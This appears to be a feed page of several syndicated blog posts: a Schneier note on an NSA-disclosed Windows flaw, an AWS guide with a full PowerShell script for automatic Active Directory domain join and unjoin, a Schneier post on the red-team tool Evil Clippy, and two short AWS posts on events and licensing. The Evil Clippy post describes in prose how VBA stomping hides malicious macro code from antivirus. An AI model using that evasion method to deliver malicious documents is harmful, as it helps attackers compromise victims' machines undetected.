The vulnerability places Windows endpoints at risk to a broad range of exploitation vectors. NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable.The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available.Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners.

Early yesterday morning, NSA’s Cybersecurity Directorate head Anne Neuberger hosted a media call where she talked about the vulnerability and — to my shock — took questions from the attendees. According to her, the NSA discovered this vulnerability as part of its security research. (If it found it in some other nation’s cyberweapons stash — my personal favorite theory — she declined to say.) She did not answer when asked how long ago the NSA discovered the vulnerability. She said that this is not the first time the NSA sent Microsoft a vulnerability to fix, but it was the first time it has publicly taken credit for the discovery. The reason is that the NSA is trying to rebuild trust with the security community, and this disclosure is a result of its new initiative to share findings more quickly and more often.

Barring any other information, I would take the NSA at its word here. So, good for it.

And — seriously — patch your systems now: Windows 10 and Windows Server 2016/2019. Assume that this vulnerability has already been weaponized, probably by criminals and certainly by major governments. Even assume that the NSA is using this vulnerability — why wouldn’t it?

Ars Technica article. Wired article. CERT advisory.

EDITED TO ADD: Washington Post article.

EDITED TO ADD (1/16): The attack was demonstrated in less than 24 hours.

Brian Krebs blog post.

Managing domain membership of dynamic fleet of EC2 instances

Post Syndicated from whiteemm original https://aws.amazon.com/blogs/compute/managing-domain-membership-of-dynamic-fleet-of-ec2-instances/

This post is written by Alex Zarenin, Senior AWS Solution Architect, Microsoft Tech.

Updated: February 10, 2021

1.   Introduction

For most companies, a move of Microsoft workloads to AWS starts with “lift and shift” where existing workloads are moved from the on-premises data centers to the cloud. These workloads may include WEB and API farms, and a fleet of processing nodes, which typically depend on AD Domain membership for access to shared resources, such as file shares and SQL Server databases.

When the farms and set of processing nodes are static, which is typical for on-premises deployments, managing domain membership is simple – new instances join the AD Domain and stay there. When some machines are periodically recycled, respective AD computer accounts are disabled or deleted, and new accounts are added when new machines are added to the domain. However, these changes are slow and can be easily managed.

When these workloads are moved to the cloud, it is natural to set up WEB and API farms as scalability groups to allow for scaling up and scaling down membership to optimize cost while meeting the performance requirements. Similarly, processing nodes could be combined into scalability groups or created on-demand as a set of Amazon EC2 Spot Instances.

In either case, the fleet becomes very dynamic, and can expand and shrink multiple times to match the load or in response to some events, which makes manual management of AD Domain membership impractical. This scenario requires automated solution for managing domain membership.

2.   Challenges

This automated solution to manage domain membership of dynamic fleet of Amazon EC2 instances should provide for:

  • Seamless AD Domain joining when the new instances join the fleet and it should work both for Managed and native ADs;
  • Automatic unjoining from the AD Domain and removal from AD the respective computer account when the instance is stopped or terminated;
  • Following the best practices for protecting sensitive information – the identity of the account that is used for joining domain or removing computer account from the domain.
  • Extensive logging to facilitate troubleshooting if something does not work as expected.

3.   Solution overview

Joining an AD domain, whether native or managed, could be achieved by placing a PowerShell script that performs domain joining into the User Data section of the EC2 instance launch configuration.

It is much more difficult to implement domain unjoining and deleting computer account from AD upon instance termination as Windows does not support On-Shutdown trigger in the Task Scheduler. However, it is possible to define On-Shutdown script using the local Group Policy.

If defined, the On-Shutdown script runs on EVERY shutdown. However, joining a domain REQUIRES reboot of the machine, so On-Shutdown policy cannot be enabled on the first invocation of the User Data script as it will be removed from the domain by the On-Shutdown script right when it joins the domain. Thus, the User Data script must have some logic to define whether it is the first invocation upon instance launch, or the subsequent one following the domain join reboot. The On-Shutdown policy should be enabled only on the second start-up. This also necessitates to define the User Data script as “persistent” by specifying <persist>true</persist> in the User Data section of the launch configuration.

Both domain join and domain unjoin scripts require security context that allows to perform these operations on the domain, which is usually achieved by providing credentials for a user account with corresponding rights. In the proposed implementation, both scripts obtain account credentials from the AWS Secrets Manager under protection of security policies and roles – no credentials are stored in the scripts.

Both scripts generate detailed log of their operation stored in the Amazon CloudWatch logs.

In this post, I demonstrate a solution based upon PowerShell script that is scheduled to perform Active Directory domain joining on the instance start-up through the EC2 launch User Data script. I also show removal from the domain with the deletion of respective computer accounts from the domain upon instance shutdown using the script installed in the On-Shutdown policy.

User Data script overall logic:

  1. Initialize Logging
  2. Initialize On-Shutdown Policy
  3. Read fields UserID, Password, and Domain from prod/AD secret
  4. Verify machine’s domain membership
  5. If machine is already a member of the domain, then
    1. Enable On-Shutdown Policy
    2. Install RSAT for AD PowerShell
  6. Otherwise
    1. Create credentials from the secret
    2. Initiate domain join
    3. Request machine restart

On-Shutdown script overall logic:

  1. Initialize Logging
  2. Check cntrl variable; If cntrl variable is not set to value “run”, exit script
  3. Check whether machine is a member of the domain; if not, exit script
  4. Check if the RSAT for AD PowerShell installed; if not installed, exit the script
  5. Read fields UserID, Password, and Domain from prod/AD secret
  6. Create credentials from the secret
  7. Identify domain controller
  8. Remove machine from the domain
  9. Delete machine account from domain controller

Simplified Flow chart of User Data and On-Shutdown Scripts

Now that I have reviewed the overall logic of the scripts, I can examine components of each script in more details.

4.   Routines common to both UserData and On-Shutdown scripts

4.1. Processing configuration variables and parameters

UserData script does not accept parameters and is being executed exactly as being provided in the UserData section of the Launch configuration. However, at the beginning of the script a  variable is specified that could be easily changed:

[string]$SecretAD  = "prod/AD"

This variable provides the name of the secret defined in the Secrets Manager that contains UserID, Password, and Domain.

The On-Shutdown Group Policy invokes corresponding scrip with a parameter, which is stored in the registry as part of the policy set up. Thus, the first line of the On-Shutdown script defines the variable for this parameter:

param([string]$cntrl = "NotSet")

The next line in the On-Shutdown script provides the name of the secret – same as in the User Data script. They are generated from the corresponding variables in the User Data script.

4.2. The Logger class

Both scripts, UserData and On-Shutdown, use the same Logger class and perform logging into the Amazon CloudWatch log group /ps/boot/configuration/. If this log group does not exist, the script attempts to create respective log group. The name of the log group is stored in the Logger class variable $this.cwlGroup and can be changed if needed.

Each execution of either script creates a new log stream in the log group. The name of the log stream consists of three parts – machine name, script type, and date-time stamp. The script type is passed to the Logger class in the constructor. Two script types are used in the script – UserData for the script invoked through the UserData section and UnJoin for the script invoked through the On-Shutdown policy. These log stream names may look like

EC2AMAZ-714VBCO/UserData/2020-10-06_05.40.02

EC2AMAZ-714VBCO/UnJoin/2020-10-06_05.48.43

5.   The UserData script

The following are the major components of the UserData script.

5.1. Initializing the On-Shutdown policy

The SDManager class wraps functionality necessary to create On-Shutdown policy. The policy requires certain registry entries and a script that executes when policy is invoked. This script must be placed in a well-defined folder on the file system.

The SDManager constructor performs the following task:

  • Verifies that the folder C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown exists and, if necessary, creates it;
  • Updates On-Shutdown script stored as an array in SDManager with the parameters provided to the constructor, and then saves adjusted script in the proper location;
  • Creates all registry entries required for On-Shutdown policy;
  • Sets the parameter that will be passed to the On-Shutdown script by the policy to a value that would preclude On-Shutdown script from removing machine from the domain.

SDManager exposes two member functions, EnableUnJoin() and DisableUnJoin(). These functions update parameter passed to On-Shutdown script to enable or disable removing machine from the domain, respectively.

5.2. Reading the “secret”

Using the value of configuration variable $SecretAD, the following code example retrieves the secret value from AWS Secrets Manager and creates PowerShell credential to be used for the operations on the domain. The Domain value from the secret is also used to verify that machine is a member of required domain.

Import-Module AWSPowerShell

try { $SecretObj = (Get-SECSecretValue -SecretId $SecretAD) }

catch

    {

    $log.WriteLine("Could not load secret <" + $SecretAD + "> - terminating execution")

    return

    }

[PSCustomObject]$Secret = ($SecretObj.SecretString  | ConvertFrom-Json)

$log.WriteLine("Domain (from Secret): <" + $Secret.Domain + ">")

To get the secret from AWS Secrets Manager, you must use an AWS-specific cmdlet. To make it available, you must import the AWSPowerShell module.

5.3. Checking for domain membership and enabling On-Shutdown policy

To check for domain membership, we use WMI Win32_ComputerObject. While performing check for domain membership, we also validate that if the machine is a member of the domain, it is the domain specified in the secret.

If machine is already a member of the correct domain, the script proceeds with installing RSAT for AD PowerShell, which is required for the On-Shutdown script. It also enables the On-Shutdown script. The following code example achieves this:

$compSys = Get-WmiObject -Class Win32_ComputerSystem

if ( ($compSys.PartOfDomain) -and ($compSys.Domain -eq $Secret.Domain))

    {

    $log.WriteLine("Already member of: <" + $compSys.Domain + "> - Verifying RSAT Status")

    $RSAT = (Get-WindowsFeature RSAT-AD-PowerShell)

    if ($RSAT -eq $null)

        {

        $log.WriteLine("<RSAT-AD-PowerShell> feature not found - terminating script")

        return

        }

    $log.WriteLine("Enable OnShutdown task to un-join Domain")

    $sdm.EnableUnJoin()

    if ( (-Not $RSAT.Installed) -and ($RSAT.InstallState -eq "Available") )

        {

        $log.WriteLine("Installing <RSAT-AD-PowerShell> feature")

        Install-WindowsFeature RSAT-AD-PowerShell

        }

    $log.WriteLine("Terminating script - ")

    return

    }

5.4. Joining Domain

If a machine is not a member of the domain or member of the wrong domain, the script creates credentials from the Secret and requests domain joining with subsequent restart of the machine. The following code example performs all these tasks:

$log.WriteLine("Domain Join required")

$log.WriteLine("Disable OnShutdown task to avoid reboot loop")

$sdm.DisableUnJoin()

$password   = $Secret.Password | ConvertTo-SecureString -asPlainText -Force

$username   = $Secret.UserID + "@" + $Secret.Domain

$credential = New-Object System.Management.Automation.PSCredential($username,$password)

$log.WriteLine("Attempting to join domain <" + $Secret.Domain + ">")

Add-Computer -DomainName $Secret.Domain -Credential $credential -Restart -Force

$log.WriteLine("Requesting restart...")

 

6.   The On-Shutdown script

Many components of the On-Shutdown script, such as logging, working with the AWS Secrets Manager, and validating domain membership are either the same or very similar to respective components of the UserData script.

One interesting difference is that the On-Shutdown script accepts parameter from the respective policy. The value of this parameter is set by EnableUnJoin() and DisableUnJoin() functions in the User Data script to control whether domain un-join will happen on a particular reboot – something that I discussed earlier. Thus, you have the following code example at the beginning of On-Shutdown script:

if ($cntrl -ne "run")

      {

      $log.WriteLine("Script param <" + $cntrl + "> not set to <run> - script terminated")

      return

      }

By setting the On-Shutdown policy parameter (a value in registry) to something other than “run” we can stop On-Shutdown script from executing – this is exactly what function DisableUnJoin() does. Similarly, the function EnableUnJoin() sets the value of this parameter to “run” thus allowing the On-Shutdown script to continue execution when invoked.

Another interesting problem with this script is how to implement removing a machine from the domain and deleting respective computer account from the Active Directory. If the script first removes machine from the domain, then it cannot find domain controller to delete computer account.

Alternatively, if the script first deletes computer account, and then tries to remove computer account by changing domain to a workgroup, this change would fail. The following code example represents how this issue was resolved in the script:

import-module ActiveDirectory

$DCHostName = (Get-ADDomainController -Discover).HostName

$log.WriteLine("Using Account <" + $username + ">")

$log.WriteLine("Using Domain Controller <" + $DCHostName + ">")

Remove-Computer -WorkgroupName "WORKGROUP" -UnjoinDomainCredential $credential -Force -Confirm:$false

Remove-ADComputer -Identity $MachineName -Credential $credential -Server "$DCHostName" -Confirm:$false

Before removing machine from the domain, the script obtains and stores in a local variable the name of one of the domain controllers. Then computer is switched from domain to the workgroup. As the last step, the respective computer account is being deleted from the AD using the host name of the domain controller obtained earlier.

7.   Managing Script Credentials

Both User Data and On-Shutdown scripts obtain the domain name and user credentials to add or remove computers from the domain from AWS Secrets Manager secret with the predefined name  prod/AD. This predefined name can be changed in the script.

Details on how to create a secret are available in AWS documentation. This secret should be defined as Other type of secrets and contain at least the following fields:

  • UserID
  • Password
  • Domain

Fill in respective fields on the Secrets Manager configuration screen and chose Next as illustrated on the following screenshot:

Screenshot Store a new secret. UserID, Password, Domain

Give the new secret the name prod/AD (this name is referred to in the script) and capture the secret’s ARN. The latter is required for creating a policy that allows access to this secret.

Screenshot of Secret Details and Secret Name

8.   Creating AWS Policy and Role to access the Credential Secret

8.1. Creating IAM Policy

The next step is to use IAM to create a policy that would allow access to the secret; the policy  statement will appear as following:

{

    "Version": "2012-10-17",

    "Statement": [

        {

            "Sid": "VisualEditor0",

            "Effect": "Allow",

            "Action": "secretsmanager:GetSecretValue",

            "Resource": "arn:aws:secretsmanager:us-east-1:NNNNNNNN7225:secret:prod/AD-??????"

        }

    ]

}

Below is the AWS console screenshot with the policy statement filled in:

Screenshot with policy statement filled in

The resource in the policy is identified with the “wildcard” characters for the 6 random characters at the end of the ARN, which may change when the Secret is updated. Configuring policy with the wildcard allows to extend rights to ALL versions of the secret, which would allow for changing credential information without changing respective policy.

Screenshot of review policy. Name AdminReadDomainCreds

Let’s name this policy AdminReadDomainCreds so that we may refer to it when creating an IAM Role.

 

8.2. Creating IAM Role

Now that I defined AdminReadDomainCreds policy, you can create a role AdminDomainJoiner that refers to this policy. On the Permission tab of the role creation dialog,  attach standard SSM policy for EC2, AmazonEC2RoleforSSM, policy that allows performing required CloudWatch logging operations, CloudWatchAgentAdminPolicy, and, finally, the custom policy AdminReadDomainCreds.

The Permission tab of the role creation dialog with the respective roles attached is shown in the following screenshot:

Screenshot of permission tab with roles

This role should include our new policy, AdminReadDomainCreds, in addition to standard SSM policy for EC2.

9.   Launching the Instance

Now, you’re ready to launch the instance or create the launch configuration. When configuring the instance for launch, it’s important to assign the instance to the role AdminDomainJoiner, which you just created:

Screenshot of Configure Instance Details. IAM role as AdminDomainJoiner

In the Advanced Details section of the configuration screen, paste the script into the User Data field:

If you named your secret differently than the name prod/AD that I used, modify the script parameters SecretAD to use the name of your secret.

10.   Conclusion

That’s it! When you launch this instance, it will automatically join the domain. Upon Stop or Termination, the instance will remove itself from the domain.

 

For your convenience we provide the full text of the UserData script:

 

<powershell>
# Script parameters
[string]$SecretAD = "prod/AD"
​
class Logger {
	#----------------------------------------------
	[string] hidden  $cwlGroup
	[string] hidden  $cwlStream
	[string] hidden  $sequenceToken
	#----------------------------------------------
	# Log Initialization
	#----------------------------------------------
	Logger([string] $Action) {
		$this.cwlGroup = "/ps/boot/configuration/"
		$this.cwlStream	= "{0}/{1}/{2}" -f $env:COMPUTERNAME, $Action,
		(Get-Date -UFormat "%Y-%m-%d_%H.%M.%S")
		$this.sequenceToken = ""
		#------------------------------------------
		if ( !(Get-CWLLogGroup -LogGroupNamePrefix $this.cwlGroup) ) {
			New-CWLLogGroup -LogGroupName $this.cwlGroup
			Write-CWLRetentionPolicy -LogGroupName $this.cwlGroup -RetentionInDays 3
		}
		if ( !(Get-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamNamePrefix $this.cwlStream) ) {
			New-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamName $this.cwlStream
		}
	}
	#----------------------------------------
	[void] WriteLine([string] $msg) {
		$logEntry = New-Object -TypeName "Amazon.CloudWatchLogs.Model.InputLogEvent"
		#-----------------------------------------------------------
		$logEntry.Message = $msg
		$logEntry.Timestamp = (Get-Date).ToUniversalTime()
		if ("" -eq $this.sequenceToken) {
			# First write into empty log...
			$this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `
				-LogStreamName $this.cwlStream `
				-LogEvent $logEntry
		}
		else {
			# Subsequent write into the log...
			$this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `
				-LogStreamName $this.cwlStream `
				-SequenceToken $this.sequenceToken `
				-LogEvent $logEntry
		}
	}
}
[Logger]$log = [Logger]::new("UserData")
$log.WriteLine("------------------------------")
$log.WriteLine("Log Started - V4.0")
$RunUser = $env:username
$log.WriteLine("PowerShell session user: $RunUser")
​
class SDManager {
	#-------------------------------------------------------------------
	[Logger] hidden $SDLog
	[string] hidden $GPScrShd_0_0 = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0"
	[string] hidden $GPMScrShd_0_0 = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0"
	#-------------------------------------------------------------------
	SDManager([Logger]$Log, [string]$RegFilePath, [string]$SecretName) {
		$this.SDLog = $Log
		#----------------------------------------------------------------
		[string] $SecretLine = '[string]$SecretAD    = "' + $SecretName + '"'
		#--------------- Local Variables -------------
		[string] $GPRootPath = "C:\Windows\System32\GroupPolicy"
		[string] $GPMcnPath = "C:\Windows\System32\GroupPolicy\Machine"
		[string] $GPScrPath = "C:\Windows\System32\GroupPolicy\Machine\Scripts"
		[string] $GPSShdPath = "C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown"
		[string] $ScriptFile = [System.IO.Path]::Combine($GPSShdPath, "Shutdown-UnJoin.ps1")
		#region Shutdown script (scheduled through Local Policy)
		$ScriptBody =
		@(
			'param([string]$cntrl = "NotSet")',
			$SecretLine,
			'[string]$MachineName = $env:COMPUTERNAME',
			'class Logger {    ',
			'    #----------------------------------------------    ',
			'    [string] hidden  $cwlGroup    ',
			'    [string] hidden  $cwlStream    ',
			'    [string] hidden  $sequenceToken    ',
			'    #----------------------------------------------    ',
			'    # Log Initialization    ',
			'    #----------------------------------------------    ',
			'    Logger([string] $Action) {    ',
			'        $this.cwlGroup = "/ps/boot/configuration/"    ',
			'        $this.cwlStream = "{0}/{1}/{2}" -f $env:COMPUTERNAME, $Action,    ',
			'                                           (Get-Date -UFormat "%Y-%m-%d_%H.%M.%S")    ',
			'        $this.sequenceToken = ""    ',
			'        #------------------------------------------    ',
			'        if ( !(Get-CWLLogGroup -LogGroupNamePrefix $this.cwlGroup) ) {    ',
			'            New-CWLLogGroup -LogGroupName $this.cwlGroup    ',
			'            Write-CWLRetentionPolicy -LogGroupName $this.cwlGroup -RetentionInDays 3    ',
			'        }    ',
			'        if ( !(Get-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamNamePrefix $this.cwlStream) ) {    ',
			'            New-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamName $this.cwlStream    ',
			'        }    ',
			'    }    ',
			'    #----------------------------------------    ',
			'    [void] WriteLine([string] $msg) {    ',
			'        $logEntry = New-Object -TypeName "Amazon.CloudWatchLogs.Model.InputLogEvent"    ',
			'        #-----------------------------------------------------------    ',
			'        $logEntry.Message = $msg    ',
			'        $logEntry.Timestamp = (Get-Date).ToUniversalTime()    ',
			'        if ("" -eq $this.sequenceToken) {    ',
			'            # First write into empty log...    ',
			'            $this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `',
			'                -LogStreamName $this.cwlStream `',
			'                -LogEvent $logEntry    ',
			'        }    ',
			'        else {    ',
			'            # Subsequent write into the log...    ',
			'            $this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `',
			'                -LogStreamName $this.cwlStream `',
			'                -SequenceToken $this.sequenceToken `',
			'                -LogEvent $logEntry    ',
			'        }    ',
			'    }    ',
			'}    ',
			'[Logger]$log = [Logger]::new("UnJoin")',
			'$log.WriteLine("-----------------------------------------")',
			'$log.WriteLine("Log Started")',
			'if ($cntrl -ne "run") ',
			'    { ',
			'    $log.WriteLine("Script param <" + $cntrl + "> not set to <run> - script terminated") ',
			'    return',
			'    }',
			'$compSys = Get-WmiObject -Class Win32_ComputerSystem',
			'if ( -Not ($compSys.PartOfDomain))',
			'    {',
			'    $log.WriteLine("Not member of a domain - terminating script")',
			'    return',
			'    }',
			'$RSAT = (Get-WindowsFeature RSAT-AD-PowerShell)',
			'if ( $RSAT -eq $null -or (-Not $RSAT.Installed) )',
			'    {',
			'    $log.WriteLine("<RSAT-AD-PowerShell> feature not found - terminating script")',
			'    return',
			'    }',
			'$log.WriteLine("Removing machine <" +$MachineName + "> from Domain <" + $compSys.Domain + ">")',
			'$log.WriteLine("Reading Secret <" + $SecretAD + ">")',
			'Import-Module AWSPowerShell',
			'try { $SecretObj = (Get-SECSecretValue -SecretId $SecretAD) }',
			'catch ',
			'    { ',
			'    $log.WriteLine("Could not load secret <" + $SecretAD + "> - terminating execution")',
			'    return ',
			'    }',
			'[PSCustomObject]$Secret = ($SecretObj.SecretString  | ConvertFrom-Json)',
			'$password   = $Secret.Password | ConvertTo-SecureString -asPlainText -Force',
			'$username   = $Secret.UserID + "@" + $Secret.Domain',
			'$credential = New-Object System.Management.Automation.PSCredential($username,$password)',
			'import-module ActiveDirectory',
			'$DCHostName = (Get-ADDomainController -Discover).HostName',
			'$log.WriteLine("Using Account <" + $username + ">")',
			'$log.WriteLine("Using Domain Controller <" + $DCHostName + ">")',
			'Remove-Computer -WorkgroupName "WORKGROUP" -UnjoinDomainCredential $credential -Force -Confirm:$false ',
			'Remove-ADComputer -Identity $MachineName -Credential $credential -Server "$DCHostName" -Confirm:$false ',
			'$log.WriteLine("Machine <" +$MachineName + "> removed from Domain <" + $compSys.Domain + ">")'
		)
​
		$this.SDLog.WriteLine("Constracting artifacts required for domain UnJoin")
		#----------------------------------------------------------------
		try {
			if (!(Test-Path -Path $GPRootPath -pathType container))
			{ New-Item -ItemType directory -Path $GPRootPath }
			if (!(Test-Path -Path $GPMcnPath -pathType container))
			{ New-Item -ItemType directory -Path $GPMcnPath }
			if (!(Test-Path -Path $GPScrPath -pathType container))
			{ New-Item -ItemType directory -Path $GPScrPath }
			if (!(Test-Path -Path $GPSShdPath -pathType container))
			{ New-Item -ItemType directory -Path $GPSShdPath }
		}
		catch {
			$this.SDLog.WriteLine("Failure creating UnJoin script directory!" )
			$this.SDLog.WriteLine($_)
		}
		#----------------------------------------
		try {
			Set-Content $ScriptFile -Value $ScriptBody
		}
		catch {
			$this.SDLog.WriteLine("Failure saving UnJoin script!" )
			$this.SDLog.WriteLine($_)
		}
		#----------------------------------------
		$RegistryScript =
		@(
			'Windows Registry Editor Version 5.00',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0]',
			'"GPO-ID"="LocalGPO"',
			'"SOM-ID"="Local"',
			'"FileSysPath"="C:\\Windows\\System32\\GroupPolicy\\Machine"',
			'"DisplayName"="Local Group Policy"',
			'"GPOName"="Local Group Policy"',
			'"PSScriptOrder"=dword:00000001',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0]',
			'"Script"="Shutdown-UnJoin.ps1"',
			'"Parameters"=""',
			'"IsPowershell"=dword:00000001',
			'"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0]',
			'"GPO-ID"="LocalGPO"',
			'"SOM-ID"="Local"',
			'"FileSysPath"="C:\\Windows\\System32\\GroupPolicy\\Machine"',
			'"DisplayName"="Local Group Policy"',
			'"GPOName"="Local Group Policy"',
			'"PSScriptOrder"=dword:00000001',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0]',
			'"Script"="Shutdown-UnJoin.ps1"',
			'"Parameters"=""',
			'"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup]'
		)
		try {
			[string] $RegistryFile = [System.IO.Path]::Combine($RegFilePath, "OnShutdown.reg")
			Set-Content $RegistryFile -Value $RegistryScript
			&regedit.exe /S "$RegistryFile"
		}
		catch {
			$this.SDLog.WriteLine("Failure creating policy entry in Registry!" )
			$this.SDLog.WriteLine($_)
		}
	}
	#----------------------------------------
	[void] DisableUnJoin() {
		try {
			Set-ItemProperty -Path $this.GPScrShd_0_0  -Name "Parameters" -Value "ignore"
			Set-ItemProperty -Path $this.GPMScrShd_0_0 -Name "Parameters" -Value "ignore"
			&gpupdate /Target:computer /Wait:0
		}
		catch {
			$this.SDLog.WriteLine("Failure in <DisableUnjoin> function!" )
			$this.SDLog.WriteLine($_)
		}
	}
	#----------------------------------------
	[void] EnableUnJoin() {
		try {
			Set-ItemProperty -Path $this.GPScrShd_0_0  -Name "Parameters" -Value "run"
			Set-ItemProperty -Path $this.GPMScrShd_0_0 -Name "Parameters" -Value "run"
			&gpupdate /Target:computer /Wait:0
		}
		catch {
			$this.SDLog.WriteLine("Failure in <EnableUnjoin> function!" )
			$this.SDLog.WriteLine($_)
		}
	}
}
​
[SDManager]$sdm = [SDManager]::new($Log, "C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts", $SecretAD)
​
$log.WriteLine("Loading Secret <" + $SecretAD + ">")
Import-Module AWSPowerShell
try { $SecretObj = (Get-SECSecretValue -SecretId $SecretAD) }
catch {
	$log.WriteLine("Could not load secret <" + $SecretAD + "> - terminating execution")
	return
}
[PSCustomObject]$Secret = ($SecretObj.SecretString  | ConvertFrom-Json)
$log.WriteLine("Domain (from Secret): <" + $Secret.Domain + ">")
# Verify domain membership
$compSys = Get-WmiObject -Class Win32_ComputerSystem
#------------------------------------------------------------------------------
if ( ($compSys.PartOfDomain) -and ($compSys.Domain -eq $Secret.Domain)) {
	$log.WriteLine("Already member of: <" + $compSys.Domain + "> - Verifying RSAT Status")
​
	$RSAT = (Get-WindowsFeature RSAT-AD-PowerShell)
	if ($null -eq $RSAT) {
		$log.WriteLine("<RSAT-AD-PowerShell> feature not found - terminating script")
		return
	}
​
	$log.WriteLine("Enable OnShutdown task to un-join Domain")
	$sdm.EnableUnJoin()
​
	if ( (-Not $RSAT.Installed) -and ($RSAT.InstallState -eq "Available") ) {
		$log.WriteLine("Installing <RSAT-AD-PowerShell> feature")
		Install-WindowsFeature RSAT-AD-PowerShell
	}
​
	$log.WriteLine("Terminating script - ")
	return
}
# Performing Domain Join
$log.WriteLine("Domain Join required")
​
$log.WriteLine("Disable OnShutdown task to avoid reboot loop")
$sdm.DisableUnJoin()
$password = $Secret.Password | ConvertTo-SecureString -asPlainText -Force
$username = $Secret.UserID + "@" + $Secret.Domain
$credential = New-Object System.Management.Automation.PSCredential($username, $password)
​
$log.WriteLine("Attempting to join domain <" + $Secret.Domain + ">")
Add-Computer -DomainName $Secret.Domain -Credential $credential -Restart -Force
​
$log.WriteLine("Requesting restart...")
#------------------------------------------------------------------------------
</powershell>
<persist>true</persist>

 

Malicious MS Office Macro Creator

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/05/malicious_ms_of.html

Evil Clippy is a tool for creating malicious Microsoft Office macros:

At BlackHat Asia we released Evil Clippy, a tool which assists red teamers and security testers in creating malicious MS Office documents. Amongst others, Evil Clippy can hide VBA macros, stomp VBA code (via p-code) and confuse popular macro analysis tools. It runs on Linux, OSX and Windows.

The VBA stomping is the most powerful feature, because it gets around antivirus programs:

VBA stomping abuses a feature which is not officially documented: the undocumented PerformanceCache part of each module stream contains compiled pseudo-code (p-code) for the VBA engine. If the MS Office version specified in the _VBA_PROJECT stream matches the MS Office version of the host program (Word or Excel) then the VBA source code in the module stream is ignored and the p-code is executed instead.

In summary: if we know the version of MS Office of a target system (e.g. Office 2016, 32 bit), we can replace our malicious VBA source code with fake code, while the malicious code will still get executed via p-code. In the meantime, any tool analyzing the VBA source code (such as antivirus) is completely fooled.

Windows @ AWS re:Invent 2018

Post Syndicated from Chris Munns original https://aws.amazon.com/blogs/compute/windows-aws-reinvent-2018/

This post is courtesy of Rodney Bozo, Senior Solutions Architect – Microsoft Technologies – AWS

Windows has been a first-class citizen at AWS for over a decade. More enterprises run Windows workloads today on AWS than any other cloud—according to IDC, it’s over 57%, 2X than the next provider. Over this period, we’ve worked with customers across the globe and taken their feedback to build the solutions that best support their Microsoft workloads.

Since 2008, the Microsoft ecosystem on AWS has grown to much more than just running virtual machines. We have solutions for SQL, Active Directory, .NET developers and more, as well as options to bring your licenses to extend the value of your existing investments.

Over the course of the week at AWS re:Invent, we are offering over 75 sessions covering Microsoft technologies in AWS, with a combination of breakout sessions, workshops, chalk talks, and builder sessions.

Find the entire list of Windows and .NET sessions on the session catalog. Here are some you should try not to miss:

Leadership and Management

Windows and Active Directory

SQL

.NET

Looking to get hands-on with Microsoft?

Still looking for more?

We have an extensive list of curated content on the AWS for Microsoft Workloads Self-Study Guide, including case studies, whitepapers, previous re:Invent presentations, reference architectures, and how-to instructional videos. Check it out!

BYOL and Oversubscription

Post Syndicated from Martin Yip original https://aws.amazon.com/blogs/compute/byol-and-oversubscription/

This post is courtesy of Mike Eizensmits, Senior Solutions Architect – AWS

Most AWS customers have a significant Windows Server deployment and are also tied to a Microsoft licensing program. When it comes to Microsoft products, such as Windows Server and SQL Server, licensing models can easily dictate Cloud infrastructure solutions. AWS provides several options to support Bring Your Own Licensing (BYOL) as well as EC2 License Included models for non-BYOL workloads. Most Enterprise customers have EA’s with Microsoft which can skew their licensing strategy when considering Azure, On-premises and other Cloud Service Providers such as AWS. BYOL models may be the only reasonable implementation path when entering a new environment or spinning up new applications. Licensing can constitute a significant investment when running workloads on public cloud. To help facilitate the maximum benefit of a customer’s existing Microsoft licensing, AWS provides multiple options to utilize BYOL EC2 Dedicated Hosts and Dedicated Instances expose the physical cores of the server to Windows and applications such as SQL Server while allowing licenses with or without Software Assurance to be utilized. Bare Metal as well as VMware on AWS can minimize additional licensing costs.

Dedicated Hosts and Instances

